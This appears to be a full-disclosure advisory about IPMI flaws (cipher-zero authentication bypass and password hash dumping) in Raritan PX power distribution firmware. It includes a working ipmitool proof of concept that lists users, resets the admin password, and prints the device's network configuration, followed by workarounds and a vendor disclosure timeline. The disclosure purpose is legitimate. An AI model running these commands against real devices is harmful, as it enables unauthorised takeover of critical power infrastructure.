Raritan PX IPMI Disclosure

`  
  
Vulnerability:  
  
Raritan PX power distribution software contains several well known IPMI vulnerabilities, e.g.  
- ipmi zero cipher  
- ipmi dump hash passwords   
  
Details:  
E.g. Model DPXR20A-16:   
Software release all before and including 01.05.08 (recent version from october 2013)  
ipmitool -I lanplus -C 0 -H 17.XX.XX.XX -U admin -P ad shell ipmitool> user list  
2 admin true false true OEM  
ipmitool> user set password 2 foo  
ipmitool -I lanplus -C 0 -H 1XX.XX.XX.XX -U admin -P ad lan print Set in Progress : Set Complete  
Auth Type Support : NONE MD2 MD5 PASSWORD  
Auth Type Enable : Callback :  
: User : MD5  
: Operator : MD5  
: Admin : MD5  
: OEM : MD5  
IP Address Source : Unspecified IP Address : 17.XX.XX.XX  
Subnet Mask : 255.255.255.224  
MAC Address : 00:00:00:00:00:00  
SNMP Community String : public  
IP Header : TTL=0x40 Flags=0x40 Precedence=0x00 TOS=0x10  
BMC ARP Control : ARP Responses Enabled, Gratuitous ARP Disabled Gratituous ARP Intrvl : 2.0 seconds  
Default Gateway IP : 17.XX.XX.XX  
Default Gateway MAC : 00:00:00:00:00:00 Backup Gateway IP : 0.0.0.0  
Backup Gateway MAC : 00:00:00:00:00:00 RMCP+ Cipher Suites : 0,1,2,3,6,7,8,11,12 Cipher Suite Priv Max : uuuOXXuuOXXuOXX : X=Cipher Suite Unused  
: c=CALLBACK  
: u=USER  
: o=OPERA TOR  
: a=ADMIN  
: O=OEM   
  
  
Workaround:  
- Block IPMI Port 623  
- Hang to management network only  
- Don't use Raritan  
  
Timeline:   
2014/02/19 - Contacted CERT, VR#HRS35Y8S   
2014/05/20 - Vendor claims its fixed but won't release new firmware to verify.  
2014/07/03 - Vendor claims its fixed but still won't release new firmware to verify, neither won't send firmware to me.   
2014/07/03 - FD because lack of interest and time  
  
Regards  
Joerg  
  
  
  
  
  
`